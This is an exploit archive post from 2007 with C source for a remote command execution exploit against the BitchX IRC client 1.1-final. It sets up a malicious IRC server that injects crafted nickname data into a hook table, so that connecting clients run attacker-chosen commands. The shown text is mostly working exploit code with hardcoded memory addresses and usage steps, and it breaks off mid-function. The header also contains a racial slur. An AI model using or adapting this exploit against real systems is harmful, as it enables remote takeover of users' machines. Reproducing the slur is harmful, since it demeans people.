Home / exploits pbxs11-exec.txt
Posted on 22 June 2007
/* Name: PBXS - Pointless BitchX Sploit * Author: clarity_ * Infected Versions: 1.1-final and others? * Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one * can inject data structures allowing for the remote execution of commands! * Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx * version connects to the mischievous server "ps -aux" will be executed. * Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet */ // Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org #define HOOK_FUNCTIONS 0x81366e0 #define NICKNAME 0x8155353 #define STAR 0x8108f34 #include <stdio.h> #include <string.h> #include <stdlib.h> #define NICK_STR ":bleh!i" #define NICK_STR2 "@svun.powns.net NICK :" #define EXEC_STR "EXEC $1-" #define RAW_FMT_STR ":my_server -%u bleh :%s" typedef struct { unsigned int hook_functions, nickname, star; unsigned int base, diff, offset; } Addresses; /* Partial structs full struct w/ correct values found in include/struct.h */ // To be loaded into nickname static typedef struct { unsigned int name; // point to hook unsigned int list; // EXEC $1- 2 words } HookFunc; // To be loaded into joined_nick static typedef struct { // unsigned int next; /* struct hook_stru *next; */ unsigned int nick; /* char *nick; */ //star unsigned int stuff; /* char *stuff; */ unsigned int shit; } Hook; char * make_nickname(Addresses *addrs, int X, int Y) { char *tmp = NULL, *sp = NULL; int i; HookFunc h; Hook hk; // malloc tmp = (char *) malloc(1024); // BASE h.name = addrs->star; h.list = addrs->base - addrs->diff - 4; if (Y) { // start loading string if (X == 4) { strcpy(tmp, NICK_STR); } else { strcpy(tmp, ":"); strcat(tmp, make_nickname(addrs, X + 1, 0)); strcat(tmp, "!i"); } sp = tmp + strlen(tmp); // point to char after tmp //*sp++ = '0' + X; strcpy(sp, NICK_STR2); } else { sp = tmp; *tmp = '